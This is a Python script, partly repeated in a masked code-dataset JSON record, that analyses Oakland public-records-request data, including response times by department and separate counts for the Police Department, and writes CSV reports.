= prr['createDate'] if recdDateTime==None: nmissRecd += 1 continue if recdDateTime < startDate: nolder += 1 continue try: recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month) except Exception as e: print('huh') if prr['status'] == 'Closed': # 180228 # closeDate = prr['statusUpDate'] closeDate = prr['closeDate'] if closeDate==None: nmissClose += 1 missCloseDetails[dept][recdMonKey].append(prrID) continue respDelay = closeDate - recdDateTime delayDays = respDelay.days responseMon[recdMonKey][delayDays] += 1 # NB: was 'Oakland Police Deparment' in 180204 if dept != 'Police Department': nonOPDresp[recdMonKey][delayDays] += 1 else: openReqMon[recdMonKey] += 1 # NB: was 'Oakland Police Deparment' in 180204 if dept != 'Police Department': nonOPDopen[recdMonKey] += 1 print('"%s",%d,%d,%d' % (dept,nolder,nmissRecd,nmissClose)) allMonth = list(responseMon.keys()) allMonth.sort() normDept = normDeptName(dept) outf = outdir + normDept + '-RT.csv' outs = open(outf,'w') outs.write('Month,NClose,NOpen,Avg,Median\n') for recdMonKey in allMonth: nreq,avgDelay = compHistAvg(responseMon[recdMonKey]) medianDelay = compMedian(responseMon[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey,nreq,openReqMon[recdMonKey],avgDelay,medianDelay)) outs.close() # outf = outdir + normDept + '-nopen.csv' # outs = open(outf,'w') # outs.write('Month,NOpen\n') # for recdMonKey in allMonth: # outs.write('%s,%d\n' % (recdMonKey,openReqMon[recdMonKey])) # outs.close() allMonth = list(nonOPDresp.keys()) allMonth.sort() outf = outdir + 'NonOPD-RT.csv' outs = open(outf,'w') outs.write('Month,N,NOPen,Avg,Median\n') for recdMonKey in allMonth: nreq,avgDelay = compHistAvg(nonOPDresp[recdMonKey]) medianDelay = compMedian(nonOPDresp[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey,nreq,nonOPDopen[recdMonKey],avgDelay,medianDelay)) outs.close() # outf = outdir + 'NonOPD-NOpen.csv' # outs = open(outf,'w') # outs.write('Month,NOpen\n') # for recdMonKey in allMonth: # outs.write('%s,%d\n' % 
(recdMonKey,nonOPDopen[recdMonKey])) # outs.close() outf = outdir + 'missClose.csv' outs = open(outf,'w') # missCloseDetails: dept -> recd -> freq allDateSet = set() for dept in missCloseDetails.keys(): allDateSet.update(missCloseDetails[dept].keys()) allDates = sorted(list(allDateSet)) hdr = 'Dept' for date in allDates: hdr += ',%s' % (date,) outs.write(hdr+'\n') for dept in sorted(missCloseDetails.keys()): line = dept for date in allDates: if date in missCloseDetails[dept]: line += ',%d' % (len(missCloseDetails[dept][date]),) else: line += ', ' outs.write(line+'\n') outs.close() def rptDeptFreq(prrTbl, deptTbl,startDate,outf): # freq = defaultdict(int) outs = open(outf,'w') outs.write('Dept,Freq\n') for dept in sorted(deptTbl.keys()): nrecent = 0 for prrIdx in deptTbl[dept]: prr = prrTbl[prrIdx] if prr['createDate'] >= startDate: nrecent += 1 outs.write('%s,%d\n' % (dept,nrecent)) outs.close() def rptOpenPRR(prrTbl,outf): daysOpen = defaultdict(lambda: defaultdict(list)) # ndays -> OPD/non -> [prrID] runDate = datetime.datetime.today() for prrID in prrTbl.keys(): prr = prrTbl[prrID] opdP = 'Police Department' in prr['dept'] if prr['status'] == 'Open' or prr['status'] == 'Overdue' or prr['status'] == 'Due soon': recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days # NB: capture integer dividend openYears = openDays // 365 if openYears == 0: dkey = openDays else: dkey = 1000 + openYears daysOpen[opdP][dkey].append(prrID) outs = open(outf,'w') outs.write('DaysOpen,NOPD,NOther,PRR-OPD,PRR-non\n') allNDaySet = set(daysOpen[0].keys()).union(set(daysOpen[0].keys())) allNDay = sorted(list(allNDaySet)) for nday in allNDay: if nday > 365: lbl = '> %d year' % (nday-1000) else: lbl = '%d' % nday opdList = daysOpen[1][nday] if nday in daysOpen[1] else [] nonList = daysOpen[0][nday] if nday in daysOpen[0] else [] outs.write('%s,%d,%d,"%s","%s"\n' % (lbl,len(opdList),len(nonList), opdList,nonList)) outs.close() def 
getWebPages(prrTbl,outf): outs = open(outf,'w') outs.write('PRRID,OPD,Text\n') nempty = 0 npdf = 0 for i,prrID in enumerate(sorted(prrTbl.keys())): prr = prrTbl[prrID] if prr['URL'] == '': nempty += 1 continue opdP = 'Police Department' in prr['dept'] url = prr['URL'] response = urllib.request.urlopen(url) webContentBytes = response.read() webContent = webContentBytes.decode("utf-8") if webContent.find('pdf') != -1: print('here') npdf += 1 else: continue if i % 100 == 0: print(i,npdf,nempty) # outs.write('%s,%d,"%s"\n' % (prrID,opdP,prr['text'])) outs.close() print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl),nempty)) def loadPRRQuery(inf): reader = csv.DictReader(open(inf)) prrIDList = [] for i,entry in enumerate(reader): # Exhibit,PRRId prrIDList.append(entry['PRRId'].strip()) return prrIDList def rptQry(qryList,outf): outs = open(outf,'w') outs.write('PRID,CreateDate,DaysOpen,Status\n') runDate = datetime.datetime.today() for prrID in qryList: prr = prr20Recent[prrID] recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days outs.write('%s,%s,%d,%s\n' % (prrID,prr['createDate'].date(),openDays,prr['status'])) outs.close() if __name__ == '__main__': dataDir = '/Users/rik/Data/c4a-Data/OAK_data/recordTrac/' startDate = datetime.datetime(2017,1,1) csvFile = dataDir + 'requests-2020-07-01-sdoran.csv' # prr20, deptTbl = bldIndexTblCSV(csvFile) prr20Recent, deptTbl = bldIndexTblCSV(csvFile,startDate) openPRRFile = dataDir + 'openPRR_200831.csv' rptOpenPRR(prr20Recent,openPRRFile) deptFreqFile = dataDir + 'deptFreq2.csv' rptDeptFreq(prr20Recent, deptTbl,startDate,deptFreqFile) createDateFile = dataDir + 'createDate_200831.csv' anlyzCreateDates(prr20Recent,createDateFile) clearDateDir = dataDir + 'deptClear_200831/' anlyzClearDates(prr20Recent,deptTbl,startDate,clearDateDir) openOPDFile = dataDir + 'openOPD_200831.csv' rptOpenPRR(prr20Recent,openOPDFile)
flexible
{ "blob_id": "b3758e42b52bb50d806832c6a3a76ae0537266de", "index": 8043, "step-1": "<mask token>\n\n\ndef freqHist3(tbl):\n \"\"\"python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t\"\"\"\n from functools import cmp_to_key\n\n def cmpd1(a, b):\n \"\"\"decreasing order of frequencies\"\"\"\n return b[1] - a[1]\n flist = list(tbl.items())\n flist.sort(key=cmp_to_key(cmpd1))\n return flist\n\n\n<mask token>\n\n\ndef bldIndexTblCSV(inf, startDate=None):\n \"\"\"return prrIDTbl, deptTbl\n\t\"\"\"\n prrTbl = {}\n deptTbl = defaultdict(list)\n statusTbl = defaultdict(int)\n ncloseDate = 0\n nolder = 0\n nmultDept = 0\n deptSepChar = b'\\xef\\xbf\\xbd'\n reader = csv.DictReader(open(inf, encoding='utf8', errors='replace'))\n for i, entry in enumerate(reader):\n prr = {}\n prrID = entry['Id']\n createDateStr = entry['Created At'].strip()\n prr['createDate'] = datetime.datetime.strptime(createDateStr,\n CSVDTFormat) if createDateStr != '' else None\n if prr['createDate'] == None or startDate != None and prr['createDate'\n ] < startDate:\n nolder += 1\n continue\n deptStr = entry['Departments'].strip()\n if deptStr.find(';') == -1:\n deptList = [deptStr]\n else:\n nmultDept += 1\n deptList = [dept.strip() for dept in deptStr.split(';')]\n deptList2 = []\n for dept in deptList:\n ndept = DeptNorm[dept] if dept in DeptNorm else dept\n if ndept != '':\n deptList2.append(ndept)\n deptTbl[ndept].append(prrID)\n prr['dept'] = deptList2\n closeDateStr = entry['Closed Date'].strip()\n prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat\n ) if closeDateStr != '' else None\n prr['status'] = entry['Status'].strip()\n prr['text'] = entry['Request Text'].strip()\n prr['closeReason'] = entry['Closure Reasons'].strip()\n prr['URL'] = entry['URL'].strip()\n statusTbl[prr['status']] += 1\n if prr['closeDate'] != None:\n ncloseDate += 1\n prrTbl[prrID] = prr\n print('bldIndexTblCSV: NPRR=%d NDept=%d 
NMultDept=%d NCloseDate=%d' % (\n len(prrTbl), len(deptTbl), nmultDept, ncloseDate))\n if startDate != None:\n print('bldIndexTblCSV: NOld dropped=%d' % nolder)\n freqList = freqHist3(statusTbl)\n print('Status,Freq')\n for status, freq in freqList:\n print('\"%s\",%d' % (status, freq))\n return prrTbl, deptTbl\n\n\ndef compHistAvg(hist):\n \"\"\"compute first moment\n\tASSUME hist: value -> freq \n\t\"\"\"\n sum = n = 0\n for v in hist.keys():\n n += hist[v]\n sum += v * hist[v]\n return n, float(sum) / n\n\n\ndef compMedian(hist):\n \"\"\"compute MEDIAN value\n\tASSUME hist: value -> freq \n\t\"\"\"\n if len(hist) == 1:\n return hist[0]\n sum = n = 0\n vn = {}\n for v in sorted(hist.keys()):\n n += hist[v]\n sum += v * hist[v]\n vn[v] = n\n half = float(n / 2.0)\n for v in sorted(hist.keys()):\n if vn[v] > half:\n return v\n\n\ndef anlyzCreateDates(prrIDTbl, outf):\n \"\"\"distribution of create dates\n\t\"\"\"\n dateDist = defaultdict(int)\n nmissdate = 0\n for prrID, prr in prrIDTbl.items():\n cdateFnd = prr['createDate']\n if cdateFnd == None:\n nmissdate += 1\n continue\n mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n dateDist[mkey] += 1\n print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate))\n allMon = list(dateDist.keys())\n allMon.sort()\n outs = open(outf, 'w')\n outs.write('Month,Freq\\n')\n for mkey in allMon:\n outs.write('%s,%d\\n' % (mkey, dateDist[mkey]))\n outs.close()\n\n\ndef normDeptName(dept):\n return re.sub('\\\\W', '_', dept.upper())\n\n\ndef anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10):\n \"\"\"Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t\"\"\"\n allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) >\n minDeptFreq]\n allDept.sort()\n nonOPDresp = defaultdict(lambda : defaultdict(int))\n nonOPDopen = defaultdict(int)\n print('\\n# Dept,NOld,NMissRecd,NMissClose')\n missCloseDetails = 
defaultdict(lambda : defaultdict(list))\n for dept in allDept:\n responseMon = defaultdict(lambda : defaultdict(int))\n openReqMon = defaultdict(int)\n nmissRecd = 0\n nmissClose = 0\n nolder = 0\n for prrID in deptTbl[dept]:\n prr = prrIDTbl[prrID]\n recdDateTime = prr['createDate']\n if recdDateTime == None:\n nmissRecd += 1\n continue\n if recdDateTime < startDate:\n nolder += 1\n continue\n try:\n recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month\n )\n except Exception as e:\n print('huh')\n if prr['status'] == 'Closed':\n closeDate = prr['closeDate']\n if closeDate == None:\n nmissClose += 1\n missCloseDetails[dept][recdMonKey].append(prrID)\n continue\n respDelay = closeDate - recdDateTime\n delayDays = respDelay.days\n responseMon[recdMonKey][delayDays] += 1\n if dept != 'Police Department':\n nonOPDresp[recdMonKey][delayDays] += 1\n else:\n openReqMon[recdMonKey] += 1\n if dept != 'Police Department':\n nonOPDopen[recdMonKey] += 1\n print('\"%s\",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose))\n allMonth = list(responseMon.keys())\n allMonth.sort()\n normDept = normDeptName(dept)\n outf = outdir + normDept + '-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,NClose,NOpen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(responseMon[recdMonKey])\n medianDelay = compMedian(responseMon[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, openReqMon[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n allMonth = list(nonOPDresp.keys())\n allMonth.sort()\n outf = outdir + 'NonOPD-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,N,NOPen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n medianDelay = compMedian(nonOPDresp[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, nonOPDopen[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n outf = outdir + 'missClose.csv'\n outs = open(outf, 'w')\n allDateSet = set()\n for dept 
in missCloseDetails.keys():\n allDateSet.update(missCloseDetails[dept].keys())\n allDates = sorted(list(allDateSet))\n hdr = 'Dept'\n for date in allDates:\n hdr += ',%s' % (date,)\n outs.write(hdr + '\\n')\n for dept in sorted(missCloseDetails.keys()):\n line = dept\n for date in allDates:\n if date in missCloseDetails[dept]:\n line += ',%d' % (len(missCloseDetails[dept][date]),)\n else:\n line += ', '\n outs.write(line + '\\n')\n outs.close()\n\n\n<mask token>\n\n\ndef getWebPages(prrTbl, outf):\n outs = open(outf, 'w')\n outs.write('PRRID,OPD,Text\\n')\n nempty = 0\n npdf = 0\n for i, prrID in enumerate(sorted(prrTbl.keys())):\n prr = prrTbl[prrID]\n if prr['URL'] == '':\n nempty += 1\n continue\n opdP = 'Police Department' in prr['dept']\n url = prr['URL']\n response = urllib.request.urlopen(url)\n webContentBytes = response.read()\n webContent = webContentBytes.decode('utf-8')\n if webContent.find('pdf') != -1:\n print('here')\n npdf += 1\n else:\n continue\n if i % 100 == 0:\n print(i, npdf, nempty)\n outs.close()\n print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty))\n\n\ndef loadPRRQuery(inf):\n reader = csv.DictReader(open(inf))\n prrIDList = []\n for i, entry in enumerate(reader):\n prrIDList.append(entry['PRRId'].strip())\n return prrIDList\n\n\ndef rptQry(qryList, outf):\n outs = open(outf, 'w')\n outs.write('PRID,CreateDate,DaysOpen,Status\\n')\n runDate = datetime.datetime.today()\n for prrID in qryList:\n prr = prr20Recent[prrID]\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n outs.write('%s,%s,%d,%s\\n' % (prrID, prr['createDate'].date(),\n openDays, prr['status']))\n outs.close()\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef freqHist3(tbl):\n \"\"\"python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t\"\"\"\n from functools import cmp_to_key\n\n def cmpd1(a, b):\n \"\"\"decreasing order of frequencies\"\"\"\n 
return b[1] - a[1]\n flist = list(tbl.items())\n flist.sort(key=cmp_to_key(cmpd1))\n return flist\n\n\n<mask token>\n\n\ndef bldIndexTblCSV(inf, startDate=None):\n \"\"\"return prrIDTbl, deptTbl\n\t\"\"\"\n prrTbl = {}\n deptTbl = defaultdict(list)\n statusTbl = defaultdict(int)\n ncloseDate = 0\n nolder = 0\n nmultDept = 0\n deptSepChar = b'\\xef\\xbf\\xbd'\n reader = csv.DictReader(open(inf, encoding='utf8', errors='replace'))\n for i, entry in enumerate(reader):\n prr = {}\n prrID = entry['Id']\n createDateStr = entry['Created At'].strip()\n prr['createDate'] = datetime.datetime.strptime(createDateStr,\n CSVDTFormat) if createDateStr != '' else None\n if prr['createDate'] == None or startDate != None and prr['createDate'\n ] < startDate:\n nolder += 1\n continue\n deptStr = entry['Departments'].strip()\n if deptStr.find(';') == -1:\n deptList = [deptStr]\n else:\n nmultDept += 1\n deptList = [dept.strip() for dept in deptStr.split(';')]\n deptList2 = []\n for dept in deptList:\n ndept = DeptNorm[dept] if dept in DeptNorm else dept\n if ndept != '':\n deptList2.append(ndept)\n deptTbl[ndept].append(prrID)\n prr['dept'] = deptList2\n closeDateStr = entry['Closed Date'].strip()\n prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat\n ) if closeDateStr != '' else None\n prr['status'] = entry['Status'].strip()\n prr['text'] = entry['Request Text'].strip()\n prr['closeReason'] = entry['Closure Reasons'].strip()\n prr['URL'] = entry['URL'].strip()\n statusTbl[prr['status']] += 1\n if prr['closeDate'] != None:\n ncloseDate += 1\n prrTbl[prrID] = prr\n print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % (\n len(prrTbl), len(deptTbl), nmultDept, ncloseDate))\n if startDate != None:\n print('bldIndexTblCSV: NOld dropped=%d' % nolder)\n freqList = freqHist3(statusTbl)\n print('Status,Freq')\n for status, freq in freqList:\n print('\"%s\",%d' % (status, freq))\n return prrTbl, deptTbl\n\n\ndef compHistAvg(hist):\n \"\"\"compute first 
moment\n\tASSUME hist: value -> freq \n\t\"\"\"\n sum = n = 0\n for v in hist.keys():\n n += hist[v]\n sum += v * hist[v]\n return n, float(sum) / n\n\n\ndef compMedian(hist):\n \"\"\"compute MEDIAN value\n\tASSUME hist: value -> freq \n\t\"\"\"\n if len(hist) == 1:\n return hist[0]\n sum = n = 0\n vn = {}\n for v in sorted(hist.keys()):\n n += hist[v]\n sum += v * hist[v]\n vn[v] = n\n half = float(n / 2.0)\n for v in sorted(hist.keys()):\n if vn[v] > half:\n return v\n\n\ndef anlyzCreateDates(prrIDTbl, outf):\n \"\"\"distribution of create dates\n\t\"\"\"\n dateDist = defaultdict(int)\n nmissdate = 0\n for prrID, prr in prrIDTbl.items():\n cdateFnd = prr['createDate']\n if cdateFnd == None:\n nmissdate += 1\n continue\n mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n dateDist[mkey] += 1\n print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate))\n allMon = list(dateDist.keys())\n allMon.sort()\n outs = open(outf, 'w')\n outs.write('Month,Freq\\n')\n for mkey in allMon:\n outs.write('%s,%d\\n' % (mkey, dateDist[mkey]))\n outs.close()\n\n\ndef normDeptName(dept):\n return re.sub('\\\\W', '_', dept.upper())\n\n\ndef anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10):\n \"\"\"Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t\"\"\"\n allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) >\n minDeptFreq]\n allDept.sort()\n nonOPDresp = defaultdict(lambda : defaultdict(int))\n nonOPDopen = defaultdict(int)\n print('\\n# Dept,NOld,NMissRecd,NMissClose')\n missCloseDetails = defaultdict(lambda : defaultdict(list))\n for dept in allDept:\n responseMon = defaultdict(lambda : defaultdict(int))\n openReqMon = defaultdict(int)\n nmissRecd = 0\n nmissClose = 0\n nolder = 0\n for prrID in deptTbl[dept]:\n prr = prrIDTbl[prrID]\n recdDateTime = prr['createDate']\n if recdDateTime == None:\n nmissRecd += 1\n continue\n if recdDateTime < startDate:\n 
nolder += 1\n continue\n try:\n recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month\n )\n except Exception as e:\n print('huh')\n if prr['status'] == 'Closed':\n closeDate = prr['closeDate']\n if closeDate == None:\n nmissClose += 1\n missCloseDetails[dept][recdMonKey].append(prrID)\n continue\n respDelay = closeDate - recdDateTime\n delayDays = respDelay.days\n responseMon[recdMonKey][delayDays] += 1\n if dept != 'Police Department':\n nonOPDresp[recdMonKey][delayDays] += 1\n else:\n openReqMon[recdMonKey] += 1\n if dept != 'Police Department':\n nonOPDopen[recdMonKey] += 1\n print('\"%s\",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose))\n allMonth = list(responseMon.keys())\n allMonth.sort()\n normDept = normDeptName(dept)\n outf = outdir + normDept + '-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,NClose,NOpen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(responseMon[recdMonKey])\n medianDelay = compMedian(responseMon[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, openReqMon[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n allMonth = list(nonOPDresp.keys())\n allMonth.sort()\n outf = outdir + 'NonOPD-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,N,NOPen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n medianDelay = compMedian(nonOPDresp[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, nonOPDopen[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n outf = outdir + 'missClose.csv'\n outs = open(outf, 'w')\n allDateSet = set()\n for dept in missCloseDetails.keys():\n allDateSet.update(missCloseDetails[dept].keys())\n allDates = sorted(list(allDateSet))\n hdr = 'Dept'\n for date in allDates:\n hdr += ',%s' % (date,)\n outs.write(hdr + '\\n')\n for dept in sorted(missCloseDetails.keys()):\n line = dept\n for date in allDates:\n if date in missCloseDetails[dept]:\n line += ',%d' % 
(len(missCloseDetails[dept][date]),)\n else:\n line += ', '\n outs.write(line + '\\n')\n outs.close()\n\n\ndef rptDeptFreq(prrTbl, deptTbl, startDate, outf):\n outs = open(outf, 'w')\n outs.write('Dept,Freq\\n')\n for dept in sorted(deptTbl.keys()):\n nrecent = 0\n for prrIdx in deptTbl[dept]:\n prr = prrTbl[prrIdx]\n if prr['createDate'] >= startDate:\n nrecent += 1\n outs.write('%s,%d\\n' % (dept, nrecent))\n outs.close()\n\n\n<mask token>\n\n\ndef getWebPages(prrTbl, outf):\n outs = open(outf, 'w')\n outs.write('PRRID,OPD,Text\\n')\n nempty = 0\n npdf = 0\n for i, prrID in enumerate(sorted(prrTbl.keys())):\n prr = prrTbl[prrID]\n if prr['URL'] == '':\n nempty += 1\n continue\n opdP = 'Police Department' in prr['dept']\n url = prr['URL']\n response = urllib.request.urlopen(url)\n webContentBytes = response.read()\n webContent = webContentBytes.decode('utf-8')\n if webContent.find('pdf') != -1:\n print('here')\n npdf += 1\n else:\n continue\n if i % 100 == 0:\n print(i, npdf, nempty)\n outs.close()\n print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty))\n\n\ndef loadPRRQuery(inf):\n reader = csv.DictReader(open(inf))\n prrIDList = []\n for i, entry in enumerate(reader):\n prrIDList.append(entry['PRRId'].strip())\n return prrIDList\n\n\ndef rptQry(qryList, outf):\n outs = open(outf, 'w')\n outs.write('PRID,CreateDate,DaysOpen,Status\\n')\n runDate = datetime.datetime.today()\n for prrID in qryList:\n prr = prr20Recent[prrID]\n recdDateTime = prr['createDate']\n openPeriod = runDate - recdDateTime\n openDays = openPeriod.days\n outs.write('%s,%s,%d,%s\\n' % (prrID, prr['createDate'].date(),\n openDays, prr['status']))\n outs.close()\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef freqHist3(tbl):\n \"\"\"python3 version\n\tASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order\n\t\"\"\"\n from functools import cmp_to_key\n\n def cmpd1(a, b):\n \"\"\"decreasing order of frequencies\"\"\"\n return b[1] - a[1]\n 
flist = list(tbl.items())\n flist.sort(key=cmp_to_key(cmpd1))\n return flist\n\n\n<mask token>\n\n\ndef bldIndexTblCSV(inf, startDate=None):\n \"\"\"return prrIDTbl, deptTbl\n\t\"\"\"\n prrTbl = {}\n deptTbl = defaultdict(list)\n statusTbl = defaultdict(int)\n ncloseDate = 0\n nolder = 0\n nmultDept = 0\n deptSepChar = b'\\xef\\xbf\\xbd'\n reader = csv.DictReader(open(inf, encoding='utf8', errors='replace'))\n for i, entry in enumerate(reader):\n prr = {}\n prrID = entry['Id']\n createDateStr = entry['Created At'].strip()\n prr['createDate'] = datetime.datetime.strptime(createDateStr,\n CSVDTFormat) if createDateStr != '' else None\n if prr['createDate'] == None or startDate != None and prr['createDate'\n ] < startDate:\n nolder += 1\n continue\n deptStr = entry['Departments'].strip()\n if deptStr.find(';') == -1:\n deptList = [deptStr]\n else:\n nmultDept += 1\n deptList = [dept.strip() for dept in deptStr.split(';')]\n deptList2 = []\n for dept in deptList:\n ndept = DeptNorm[dept] if dept in DeptNorm else dept\n if ndept != '':\n deptList2.append(ndept)\n deptTbl[ndept].append(prrID)\n prr['dept'] = deptList2\n closeDateStr = entry['Closed Date'].strip()\n prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat\n ) if closeDateStr != '' else None\n prr['status'] = entry['Status'].strip()\n prr['text'] = entry['Request Text'].strip()\n prr['closeReason'] = entry['Closure Reasons'].strip()\n prr['URL'] = entry['URL'].strip()\n statusTbl[prr['status']] += 1\n if prr['closeDate'] != None:\n ncloseDate += 1\n prrTbl[prrID] = prr\n print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % (\n len(prrTbl), len(deptTbl), nmultDept, ncloseDate))\n if startDate != None:\n print('bldIndexTblCSV: NOld dropped=%d' % nolder)\n freqList = freqHist3(statusTbl)\n print('Status,Freq')\n for status, freq in freqList:\n print('\"%s\",%d' % (status, freq))\n return prrTbl, deptTbl\n\n\ndef compHistAvg(hist):\n \"\"\"compute first moment\n\tASSUME hist: 
value -> freq \n\t\"\"\"\n sum = n = 0\n for v in hist.keys():\n n += hist[v]\n sum += v * hist[v]\n return n, float(sum) / n\n\n\ndef compMedian(hist):\n \"\"\"compute MEDIAN value\n\tASSUME hist: value -> freq \n\t\"\"\"\n if len(hist) == 1:\n return hist[0]\n sum = n = 0\n vn = {}\n for v in sorted(hist.keys()):\n n += hist[v]\n sum += v * hist[v]\n vn[v] = n\n half = float(n / 2.0)\n for v in sorted(hist.keys()):\n if vn[v] > half:\n return v\n\n\ndef anlyzCreateDates(prrIDTbl, outf):\n \"\"\"distribution of create dates\n\t\"\"\"\n dateDist = defaultdict(int)\n nmissdate = 0\n for prrID, prr in prrIDTbl.items():\n cdateFnd = prr['createDate']\n if cdateFnd == None:\n nmissdate += 1\n continue\n mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month)\n dateDist[mkey] += 1\n print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate))\n allMon = list(dateDist.keys())\n allMon.sort()\n outs = open(outf, 'w')\n outs.write('Month,Freq\\n')\n for mkey in allMon:\n outs.write('%s,%d\\n' % (mkey, dateDist[mkey]))\n outs.close()\n\n\ndef normDeptName(dept):\n return re.sub('\\\\W', '_', dept.upper())\n\n\ndef anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10):\n \"\"\"Compute average (over previous 90 days) number of days to respond to request\n\t\t\t\tNumber requests open at month start\n\t\"\"\"\n allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) >\n minDeptFreq]\n allDept.sort()\n nonOPDresp = defaultdict(lambda : defaultdict(int))\n nonOPDopen = defaultdict(int)\n print('\\n# Dept,NOld,NMissRecd,NMissClose')\n missCloseDetails = defaultdict(lambda : defaultdict(list))\n for dept in allDept:\n responseMon = defaultdict(lambda : defaultdict(int))\n openReqMon = defaultdict(int)\n nmissRecd = 0\n nmissClose = 0\n nolder = 0\n for prrID in deptTbl[dept]:\n prr = prrIDTbl[prrID]\n recdDateTime = prr['createDate']\n if recdDateTime == None:\n nmissRecd += 1\n continue\n if recdDateTime < startDate:\n nolder += 1\n continue\n 
try:\n recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month\n )\n except Exception as e:\n print('huh')\n if prr['status'] == 'Closed':\n closeDate = prr['closeDate']\n if closeDate == None:\n nmissClose += 1\n missCloseDetails[dept][recdMonKey].append(prrID)\n continue\n respDelay = closeDate - recdDateTime\n delayDays = respDelay.days\n responseMon[recdMonKey][delayDays] += 1\n if dept != 'Police Department':\n nonOPDresp[recdMonKey][delayDays] += 1\n else:\n openReqMon[recdMonKey] += 1\n if dept != 'Police Department':\n nonOPDopen[recdMonKey] += 1\n print('\"%s\",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose))\n allMonth = list(responseMon.keys())\n allMonth.sort()\n normDept = normDeptName(dept)\n outf = outdir + normDept + '-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,NClose,NOpen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(responseMon[recdMonKey])\n medianDelay = compMedian(responseMon[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, openReqMon[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n allMonth = list(nonOPDresp.keys())\n allMonth.sort()\n outf = outdir + 'NonOPD-RT.csv'\n outs = open(outf, 'w')\n outs.write('Month,N,NOPen,Avg,Median\\n')\n for recdMonKey in allMonth:\n nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey])\n medianDelay = compMedian(nonOPDresp[recdMonKey])\n outs.write('%s,%d,%d,%f,%d\\n' % (recdMonKey, nreq, nonOPDopen[\n recdMonKey], avgDelay, medianDelay))\n outs.close()\n outf = outdir + 'missClose.csv'\n outs = open(outf, 'w')\n allDateSet = set()\n for dept in missCloseDetails.keys():\n allDateSet.update(missCloseDetails[dept].keys())\n allDates = sorted(list(allDateSet))\n hdr = 'Dept'\n for date in allDates:\n hdr += ',%s' % (date,)\n outs.write(hdr + '\\n')\n for dept in sorted(missCloseDetails.keys()):\n line = dept\n for date in allDates:\n if date in missCloseDetails[dept]:\n line += ',%d' % (len(missCloseDetails[dept][date]),)\n else:\n line 
